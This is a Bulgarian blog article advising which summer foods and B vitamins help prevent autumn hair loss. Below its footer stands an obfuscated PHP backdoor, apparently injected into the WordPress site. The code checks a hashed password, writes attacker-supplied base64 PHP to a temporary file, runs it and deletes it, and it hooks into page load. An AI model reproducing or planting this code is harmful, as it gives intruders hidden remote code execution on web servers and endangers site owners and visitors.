Какво да ядем лятото, за да избегнем есенния косопад | Косопад

Какво да ядем лятото, за да избегнем есенния косопад

Лято е, така че можем да се възползваме от хранителното разнообразие през този сезон, за да избегнем есенния косопад, да направим косата силна и блестяща.

kosa-pochivka

Включете упоменатите храни в диетата си и малко по малко ще видите как косата ви се променя в положителна посока.

Не забравяйте есенциалните мастни киселини. Съдържат се в семената, маслините, риба тон, сьомга, ядки. Тялото не може да ги произвежда само, затова е важно да ги приемаме редовно: силни антиоксиданти са и не позволяват на косата да съхне или да остарява.

Витамин В.

Витамин В2: в бирената мая, прясното мляко, бобовите култури. Заздравява структурата на косъма.

Витамин В6: пълнозърнести храни, портокали, банани, зелени зеленчуци. Предпазва от омазняване на косата.

kosa-lyato

Ако искате косата ви да расте по- бързо, приемайте витамин В7 – в киселото мляко, пъпеша, бобовите растения. За да избегнете косопада, ваш съюзник е В8 – в жълтъка, соята, бирената мая, доматите.

Също така трябва да споменем и фолиевата киселина, също витамин В, която действа върху меланина и защитава цвета на косата. Съдържа се в морковите, доматите, триците, житния зародиш.

ДРУГИ СРЕДСТВА…

За да поддържаме косата блестяща, приемайте сяра, която помага за производството на повече кератин и колаген. Съдържа се в яйцето, лука, аспержите и чесъна.
За растеж на косата, яжте повече орехи, лешници, фъстъци, лук и др.
Предпазвайте косата от слънцето като наблегнете на краставици, житни зародиши и зеленолистни зеленчуци.

01. юли 2014 16:19:18 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}